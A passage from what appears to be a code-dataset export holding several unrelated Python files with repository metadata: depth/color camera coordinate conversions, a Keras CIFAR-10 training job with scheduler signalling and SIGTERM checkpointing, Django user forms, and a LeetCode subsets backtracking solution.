# the 3x3 block, translation in the last column).
CAM_EXTR = [[0.999988496304, -0.00468848412856,
             0.000982563360594, 25.7],
            [0.00469115935266, 0.999985218048,
             -0.00273845880292, 1.22],
            [-0.000969709653873, 0.00274303671904,
             0.99999576807, 3.902],
            [0, 0, 0, 1]]
# Color-camera pinhole intrinsics: focal lengths and principal point.
FOCAL_LENGTH_X_COLOR = 1395.749023
FOCAL_LENGTH_Y_COLOR = 1395.749268
X0_COLOR = 935.732544
Y0_COLOR = 540.681030
CAM_INTR_COLOR = [[FOCAL_LENGTH_X_COLOR, 0, X0_COLOR],
                  [0, FOCAL_LENGTH_Y_COLOR, Y0_COLOR],
                  [0, 0, 1]]
# Depth-camera pinhole intrinsics: focal lengths and principal point.
FOCAL_LENGTH_X_DEPTH = 475.065948
FOCAL_LENGTH_Y_DEPTH = 475.065857
X0_DEPTH = 315.944855
Y0_DEPTH = 245.287079
CAM_INTR_DEPTH = [[FOCAL_LENGTH_X_DEPTH, 0, X0_DEPTH],
                  [0, FOCAL_LENGTH_Y_DEPTH, Y0_DEPTH],
                  [0, 0, 1]]
# Presumably bounding-box normalization values (u, v, d) and a box size in
# pixels; neither is referenced in this file — verify against callers.
BBOX_NORMUVD = [397, 361, 1004.3588]
BBSIZE = 260
# 3x4 inverse of CAM_EXTR (color-camera frame back to XYZ space), as used
# by uvd2xyz_color and ccs2xyz_color below.
INV_CAM_EXTR = [[0.99998855624950122256, 0.0046911597684540387191,
                 -0.00096970967236367877683, -25.701645303388132272],
                [-0.0046884842637616731197, 0.99998527559956268165,
                 0.0027430368219501163773, -1.1101913203320408265],
                [0.00098256339938933108913, -0.0027384588555197885184,
                 0.99999576732453258074, -3.9238944436608977969]]
# ========================================================
# XYZ UVD CONVERSION
# ========================================================
def uvd2xyz_depth(skel_uvd):
    """Back-project depth-camera UVD keypoints to XYZ camera coordinates.

    Inverts the pinhole model using the depth intrinsics:
    x = (u - cx) / fx * d,  y = (v - cy) / fy * d,  z = d.

    Args:
        skel_uvd: array of shape (..., 3) holding (u, v, depth) per point.

    Returns:
        float32 array of the same shape with (x, y, z) per point.
    """
    # Allocate the float32 output directly; the original
    # empty_like(...).astype("float32") allocated an array and then
    # immediately copied it into a second one.
    skel_xyz = np.empty_like(skel_uvd, dtype="float32")
    fx0 = FOCAL_LENGTH_X_DEPTH
    fy0 = FOCAL_LENGTH_Y_DEPTH
    skel_xyz[..., 0] = (skel_uvd[..., 0] - X0_DEPTH) / fx0 * skel_uvd[..., 2]
    skel_xyz[..., 1] = (skel_uvd[..., 1] - Y0_DEPTH) / fy0 * skel_uvd[..., 2]
    skel_xyz[..., 2] = skel_uvd[..., 2]
    return skel_xyz
def xyz2uvd_depth(skel_xyz):
    """Project XYZ depth-camera coordinates to UVD pixel coordinates.

    Pinhole projection with the depth intrinsics:
    u = cx + fx * x / z,  v = cy + fy * y / z,  d = z.

    Args:
        skel_xyz: array of shape (..., 3) holding (x, y, z) per point.

    Returns:
        float32 array of the same shape with (u, v, depth) per point.
    """
    # Single float32 allocation instead of empty_like(...).astype(...),
    # which allocated twice.
    skel_uvd = np.empty_like(skel_xyz, dtype="float32")
    skel_uvd[..., 0] = X0_DEPTH + \
        FOCAL_LENGTH_X_DEPTH * (skel_xyz[..., 0] / skel_xyz[..., 2])
    skel_uvd[..., 1] = Y0_DEPTH + \
        FOCAL_LENGTH_Y_DEPTH * (skel_xyz[..., 1] / skel_xyz[..., 2])
    skel_uvd[..., 2] = skel_xyz[..., 2]
    return skel_uvd
def xyz2uvd_color(skel_xyz):
    """Project XYZ-space points into the color camera's UVD space.

    First applies the rigid extrinsic transform CAM_EXTR to move points
    into the color-camera frame, then a pinhole projection with the color
    intrinsics. The returned depth channel is z in the color-camera frame.

    Args:
        skel_xyz: array of shape (..., 3) holding (x, y, z) per point.

    Returns:
        float32 array of the same shape with (u, v, depth) per point.
    """
    # Single float32 allocation instead of empty_like(...).astype(...),
    # which allocated twice.
    skel_uvd = np.empty_like(skel_xyz, dtype="float32")
    # Rigid transform into the color camera coordinate system.
    ccs_x = CAM_EXTR[0][0]*skel_xyz[..., 0] + \
            CAM_EXTR[0][1]*skel_xyz[..., 1] + \
            CAM_EXTR[0][2]*skel_xyz[..., 2] + CAM_EXTR[0][3]
    ccs_y = CAM_EXTR[1][0]*skel_xyz[..., 0] + \
            CAM_EXTR[1][1]*skel_xyz[..., 1] + \
            CAM_EXTR[1][2]*skel_xyz[..., 2] + CAM_EXTR[1][3]
    ccs_z = CAM_EXTR[2][0]*skel_xyz[..., 0] + \
            CAM_EXTR[2][1]*skel_xyz[..., 1] + \
            CAM_EXTR[2][2]*skel_xyz[..., 2] + CAM_EXTR[2][3]
    # Pinhole projection with the color intrinsics.
    skel_uvd[..., 0] = X0_COLOR + FOCAL_LENGTH_X_COLOR*(ccs_x/ccs_z)
    skel_uvd[..., 1] = Y0_COLOR + FOCAL_LENGTH_Y_COLOR*(ccs_y/ccs_z)
    skel_uvd[..., 2] = ccs_z
    return skel_uvd
def uvd2xyz_color(skel_uvd):
    """Back-project color-camera UVD points to XYZ space.

    Inverts the pinhole projection with the color intrinsics, then applies
    the inverse extrinsic transform INV_CAM_EXTR.

    Args:
        skel_uvd: array of shape (..., 3) holding (u, v, depth) per point.

    Returns:
        float32 array of the same shape with (x, y, z) per point.
    """
    # Back-project into the color camera coordinate system.
    ccs_z = skel_uvd[..., 2]
    ccs_x = ((skel_uvd[..., 0] - X0_COLOR) / FOCAL_LENGTH_X_COLOR) * ccs_z
    ccs_y = ((skel_uvd[..., 1] - Y0_COLOR) / FOCAL_LENGTH_Y_COLOR) * ccs_z
    # Single float32 allocation instead of empty_like(...).astype(...),
    # which allocated twice.
    skel_xyz = np.empty_like(skel_uvd, dtype="float32")
    # Inverse rigid transform back to XYZ space.
    skel_xyz[..., 0] = INV_CAM_EXTR[0][0]*ccs_x + \
                       INV_CAM_EXTR[0][1]*ccs_y + \
                       INV_CAM_EXTR[0][2]*ccs_z + INV_CAM_EXTR[0][3]
    skel_xyz[..., 1] = INV_CAM_EXTR[1][0]*ccs_x + \
                       INV_CAM_EXTR[1][1]*ccs_y + \
                       INV_CAM_EXTR[1][2]*ccs_z + INV_CAM_EXTR[1][3]
    skel_xyz[..., 2] = INV_CAM_EXTR[2][0]*ccs_x + \
                       INV_CAM_EXTR[2][1]*ccs_y + \
                       INV_CAM_EXTR[2][2]*ccs_z + INV_CAM_EXTR[2][3]
    return skel_xyz
def xyz2ccs_color(skel_xyz):
    """Rigidly transform XYZ points into the color camera coordinate
    system (extrinsics only, no projection).

    Args:
        skel_xyz: array of shape (..., 3) holding (x, y, z) per point.

    Returns:
        float32 array of the same shape in the color-camera frame.
    """
    # Single float32 allocation instead of empty_like(...).astype(...),
    # which allocated twice.
    skel_ccs = np.empty_like(skel_xyz, dtype="float32")
    skel_ccs[..., 0] = CAM_EXTR[0][0]*skel_xyz[..., 0] + \
                       CAM_EXTR[0][1]*skel_xyz[..., 1] + \
                       CAM_EXTR[0][2]*skel_xyz[..., 2] + CAM_EXTR[0][3]
    skel_ccs[..., 1] = CAM_EXTR[1][0]*skel_xyz[..., 0] + \
                       CAM_EXTR[1][1]*skel_xyz[..., 1] + \
                       CAM_EXTR[1][2]*skel_xyz[..., 2] + CAM_EXTR[1][3]
    skel_ccs[..., 2] = CAM_EXTR[2][0]*skel_xyz[..., 0] + \
                       CAM_EXTR[2][1]*skel_xyz[..., 1] + \
                       CAM_EXTR[2][2]*skel_xyz[..., 2] + CAM_EXTR[2][3]
    return skel_ccs
def ccs2uvd_color(skel_ccs):
    """Color camera coordinate space to UVD (pinhole projection).

    u = X0 + fx * x/z, v = Y0 + fy * y/z; depth is copied through.
    """
    pixels = np.empty_like(skel_ccs).astype("float32")
    depth = skel_ccs[..., 2]
    pixels[..., 0] = X0_COLOR + FOCAL_LENGTH_X_COLOR * (skel_ccs[..., 0] / depth)
    pixels[..., 1] = Y0_COLOR + FOCAL_LENGTH_Y_COLOR * (skel_ccs[..., 1] / depth)
    pixels[..., 2] = depth
    return pixels
def uvd2ccs_color(skel_uvd):
    """UVD space back to the color camera coordinate space (unproject).

    x = (u - X0)/fx * d, y = (v - Y0)/fy * d; depth is copied through.
    """
    cam = np.empty_like(skel_uvd).astype("float32")
    depth = skel_uvd[..., 2]
    cam[..., 2] = depth
    cam[..., 0] = ((skel_uvd[..., 0] - X0_COLOR) / FOCAL_LENGTH_X_COLOR) * depth
    cam[..., 1] = ((skel_uvd[..., 1] - Y0_COLOR) / FOCAL_LENGTH_Y_COLOR) * depth
    return cam
def ccs2xyz_color(skel_ccs):
    """Color camera coordinate space back to XYZ space.

    Applies the 3x4 inverse-extrinsic matrix ``INV_CAM_EXTR`` row by row.
    """
    cx, cy, cz = skel_ccs[..., 0], skel_ccs[..., 1], skel_ccs[..., 2]
    world = np.empty_like(skel_ccs).astype("float32")
    for axis in range(3):
        row = INV_CAM_EXTR[axis]
        world[..., axis] = row[0]*cx + row[1]*cy + row[2]*cz + row[3]
    return world
# ========================================================
# GET LABELS
# ========================================================
def get_action_dict():
    """Map zero-based action ids to action names.

    Reads 'action_object_info.txt' under ROOT, skipping the header row.
    Each data row starts with '<1-based id> <action name> ...', so the id
    is shifted down by one to make the dict zero-based.
    """
    info_path = Path(ROOT) / 'First_Person_Action_Benchmark/action_object_info.txt'
    actions = {}
    with open(info_path, 'r') as handle:
        for row in handle.readlines()[1:]:
            fields = row.split(' ')
            actions[int(fields[0]) - 1] = fields[1]
    return actions
def get_obj_dict():
    """Map indices to the sorted unique object names.

    The third column of each data row in 'action_object_info.txt' names
    the object; np.unique sorts and de-duplicates the names before the
    index -> name dict is built.
    """
    info_path = Path(ROOT) / 'First_Person_Action_Benchmark/action_object_info.txt'
    names = []
    with open(info_path, 'r') as handle:
        for row in handle.readlines()[1:]:
            names.append(row.split(' ')[2])
    unique_names = np.unique(names)
    return {idx: name for idx, name in enumerate(unique_names)}
"[email protected]"
] | |
85c95a3b601684446b03adad7c6161cdc1be33ba | b2d3bd39b2de8bcc3b0f05f4800c2fabf83d3c6a | /examples/pwr_run/checkpointing/final/high_overhead/job58.py | 61a74ad5fb05cb5f37bbeece917ae726b6d199bf | [
"MIT"
] | permissive | boringlee24/keras_old | 3bf7e3ef455dd4262e41248f13c04c071039270e | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | refs/heads/master | 2021-11-21T03:03:13.656700 | 2021-11-11T21:57:54 | 2021-11-11T21:57:54 | 198,494,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,328 | py | """
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.mobilenet_v2 import MobileNetV2
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
# --------------------------------------------------------------------------
# Command-line interface and scheduler bookkeeping
# --------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()

# Pin this process to the GPU chosen by the scheduler.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num

# Training parameters
batch_size = 256
args_lr = 0.002
epoch_begin_time = 0  # wall-clock start of the current epoch; 0 means no epoch has started yet

# Job identity is derived from the script file name ('job58.py' -> 'job58').
job_name = sys.argv[0].split('.')[0]
# Glob pattern matching any checkpoint previously saved by this job.
save_files = '/scratch/li.baol/checkpoint_final4/' + job_name + '*'

total_epochs = 7
starting_epoch = 0

# first step is to update the PID: report it so the scheduler can signal us later.
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)

if args.resume:
    # Recover the epoch number encoded in the checkpoint file name
    # ('<job>_<epoch>.h5').  NOTE(review): glob.glob(...)[0] raises
    # IndexError when no checkpoint exists — presumably the scheduler only
    # passes --resume when one does; confirm.
    save_file = glob.glob(save_files)[0]
    # epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
    starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
# --------------------------------------------------------------------------
# Dataset preparation (CIFAR-10)
# --------------------------------------------------------------------------
data_augmentation = True
num_classes = 10

# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True

n = 3

# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'

# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()

# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255

# If subtract pixel mean is enabled, center both splits with the mean
# computed on the training set only (avoids test-set leakage).
if subtract_pixel_mean:
    x_train_mean = np.mean(x_train, axis=0)
    x_train -= x_train_mean
    x_test -= x_train_mean

print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)

# Convert class vectors to binary class matrices (one-hot labels).
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# Either restore the model from the latest checkpoint or build a fresh one.
if args.resume:
    print('resume from checkpoint')
    # NOTE(review): deliberate 100 s stall before loading — presumably
    # simulates high checkpoint-restore overhead; confirm intent.
    time.sleep(100)
    message = job_name + ' b_end'
    send_signal.send(args.node, 10002, message)
    # load_model restores architecture, weights and compile state together.
    model = keras.models.load_model(save_file)
    message = job_name + ' c_end'
    send_signal.send(args.node, 10002, message)
else:
    print('train from start')
    model = models.Sequential()
    # MobileNetV2 backbone trained from scratch (weights=None) on 32x32 inputs.
    base_model = MobileNetV2(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
    #base_model.summary()
    #pdb.set_trace()
    model.add(base_model)
    model.add(layers.Flatten())
    #model.add(layers.BatchNormalization())
    #model.add(layers.Dense(128, activation='relu'))
    #model.add(layers.Dropout(0.5))
    #model.add(layers.BatchNormalization())
    #model.add(layers.Dense(64, activation='relu'))
    #model.add(layers.Dropout(0.5))
    #model.add(layers.BatchNormalization())
    model.add(layers.Dense(10, activation='softmax'))

    # Compile only the freshly built model; the resumed model keeps the
    # optimizer state restored by load_model.
    model.compile(loss='categorical_crossentropy',
                  optimizer=Adam(lr=args_lr),
                  metrics=['accuracy'])
    #model.summary()
    print(model_type)

#pdb.set_trace()

current_epoch = 0  # updated by the PrintEpoch callback; read by the SIGTERM handler
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
    """SIGTERM handler: report wasted epoch time, checkpoint the model,
    notify the scheduler, then exit.

    Registered below via signal.signal; the scheduler preempts this job
    with `kill -15`.
    """
    # first record the wasted epoch time — time already spent in the
    # current, unfinished epoch, which will be repeated after resume.
    global epoch_begin_time
    if epoch_begin_time == 0:
        epoch_waste_time = 0
    else:
        epoch_waste_time = int(time.time() - epoch_begin_time)
    message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
    if epoch_waste_time > 0:
        send_signal.send(args.node, 10002, message)
    print('checkpointing the model triggered by kill -15 signal')
    # delete whatever checkpoint that already exists (only the newest is kept)
    for f in glob.glob(save_files):
        os.remove(f)
    # Save as '<job>_<epoch>.h5' so the resume path can parse the epoch back out.
    model.save('/scratch/li.baol/checkpoint_final4/' + job_name + '_' + str(current_epoch) + '.h5')
    print ('(SIGTERM) terminating the process')
    message = job_name + ' checkpoint'
    send_signal.send(args.node, 10002, message)
    sys.exit()

signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
# TensorBoard logs are grouped by testcase, then by job name.
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name

tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')

first_epoch_start = 0  # wall-clock time when the first trained epoch began
class PrintEpoch(keras.callbacks.Callback):
    """Keras callback reporting training progress to the scheduler.

    Messages sent to port 10002 on args.node:
      * 'd_end'            — first epoch after a resume has begun
      * 'ckpt_qual'        — checkpointing is now meaningful
      * '1st_epoch <sec>'  — duration of the first epoch of this run
      * 'completion <frac>'— fraction of the halved epoch budget done
    """
    def on_epoch_begin(self, epoch, logs=None):
        global current_epoch, first_epoch_start
        #remaining_epochs = epochs - epoch
        current_epoch = epoch
        print('current epoch ' + str(current_epoch))
        global epoch_begin_time
        # Timestamp used by the SIGTERM handler to compute wasted time.
        epoch_begin_time = time.time()
        if epoch == starting_epoch and args.resume:
            first_epoch_start = time.time()
            message = job_name + ' d_end'
            send_signal.send(args.node, 10002, message)
        elif epoch == starting_epoch:
            first_epoch_start = time.time()
        if epoch == starting_epoch:
            # send signal to indicate checkpoint is qualified
            message = job_name + ' ckpt_qual'
            send_signal.send(args.node, 10002, message)

    def on_epoch_end(self, epoch, logs=None):
        if epoch == starting_epoch:
            first_epoch_time = int(time.time() - first_epoch_start)
            message = job_name + ' 1st_epoch ' + str(first_epoch_time)
            send_signal.send(args.node, 10002, message)
        # Progress is measured against round(total_epochs/2), the same
        # budget passed to model.fit as epochs=.
        progress = round((epoch+1) / round(total_epochs/2), 2)
        message = job_name + ' completion ' + str(progress)
        send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()

callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]

# Run training — note the budget is half of total_epochs, and
# initial_epoch lets a resumed job continue where the checkpoint left off.
model.fit(x_train, y_train,
          batch_size=batch_size,
          epochs=round(total_epochs/2),
          validation_data=(x_test, y_test),
          shuffle=True,
          callbacks=callbacks,
          initial_epoch=starting_epoch,
          verbose=1
          )

# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])

# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
"[email protected]"
] | |
e10826db48bc30e47dd014c15a1662c7c79db3f1 | 27696870511ac02b75e4389fa4b54afa0f3978d0 | /mysite/apps/users/forms.py | ed7cf48fadccff4eab2da9a21a8251c423c7a5d2 | [] | no_license | tminlun/OnlineEducation | ef4f7f6a3742b10dcaf4d263a9366fa1446d73fe | 5008aeaa14a15b799d37fadd44c1c17b9ade7a68 | refs/heads/master | 2020-04-09T19:01:22.747193 | 2019-02-05T03:15:56 | 2019-02-05T03:15:56 | 160,531,635 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | from captcha.fields import CaptchaField
from django import forms
from .models import UserProfile
class LoginForm(forms.Form):
    """Login validation form."""
    username = forms.CharField(required=True)
    password = forms.CharField(required=True, min_length=6)
class RegisterForm(forms.Form):
    """Registration validation form."""
    username = forms.CharField(required=True, min_length=2,max_length=10)
    email = forms.EmailField(required=True)
    password = forms.CharField(required=True, min_length=6,max_length=20)
    password_again = forms.CharField(required=True, min_length=6, max_length=20)
    # CAPTCHA field with a custom error message: the key 'invalid' is fixed
    # by django-simple-captcha, the message text is free-form.
    captcha = CaptchaField(error_messages={"invalid": "验证码输入错误"})
class ForgetPwdForm(forms.Form):
    """Password-recovery form."""
    email = forms.EmailField(required=True)
    captcha = CaptchaField(error_messages={"invalid": "验证码输入错误"})
class ModifyPwdForm(forms.Form):
    """Password modification form (new password entered twice).

    NOTE(review): the original docstring said "password recovery form",
    apparently copy-pasted from ForgetPwdForm.
    """
    password1 = forms.CharField(required=True, min_length=6, max_length=15)
    password2 = forms.CharField(required=True, min_length=6, max_length=15)
class ModifyImageForm(forms.ModelForm):
    """Avatar upload form — exposes only UserProfile.image."""
    class Meta:
        model = UserProfile
        fields = ['image']
class UpdatePwdForm(forms.Form):
    """Password update form (same fields as ModifyPwdForm)."""
    password1 = forms.CharField(required=True, min_length=6, max_length=15)
    password2 = forms.CharField(required=True, min_length=6, max_length=15)
class UpdateUserForm(forms.ModelForm):
    """Profile information update form."""
    class Meta:
        model = UserProfile
        # NOTE(review): 'brithday', 'gander' and 'adress' presumably mirror
        # misspelled UserProfile field names — confirm against the model
        # before renaming anything here.
        fields = ['nick_name', 'brithday', 'gander', 'adress', 'mobile']
| [
"[email protected]"
] | |
6871dbe97578fe8557bb9d770b9e99836a77fab7 | ebf7427c8605d8654c67e3386b8adb2bd7503b44 | /LeetCode Pattern/3. Backtracking/78_med_subsets.py | 531b1f975ffeb5fe748d8104138d4181755a7f74 | [] | no_license | ryoman81/Leetcode-challenge | 78e5bc4800a440052f8515c75829e669484fed40 | fac3a49c49d2f62eafffb201a9d9cfac988ad30a | refs/heads/master | 2023-09-04T05:21:54.569459 | 2021-10-26T14:14:08 | 2021-10-26T14:14:08 | 291,615,959 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | '''
Given an integer array nums of unique elements, return all possible subsets (the power set).
The solution set must not contain duplicate subsets. Return the solution in any order.
Example 1:
Input: nums = [1,2,3]
Output: [[],[1],[2],[1,2],[3],[1,3],[2,3],[1,2,3]]
Example 2:
Input: nums = [0]
Output: [[],[0]]
Constraints:
1 <= nums.length <= 10
-10 <= nums[i] <= 10
All the numbers of nums are unique.
'''
class Solution:
    """Power set via depth-first backtracking.

    Each recursion level first records the current partial subset, then
    extends it with every element at or after `start`, so all 2^n
    subsets are emitted exactly once, in the same DFS order as a manual
    enumeration.

    Complexity:
        Time:  O(n * 2^n) — each of the 2^n subsets is copied, up to n per copy.
        Space: O(n) auxiliary for the recursion stack and the working path.
    """
    def subsets(self, nums):
        collected = []
        current = []

        def explore(start):
            # Every node of the search tree is itself a valid subset.
            collected.append(list(current))
            for idx in range(start, len(nums)):
                current.append(nums[idx])
                explore(idx + 1)
                current.pop()

        explore(0)
        return collected
## Run code after defining input and solver
input1 = [1,2,3]  # sample input from the problem statement (expects 8 subsets)
solver = Solution().subsets
print(solver(input1))
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.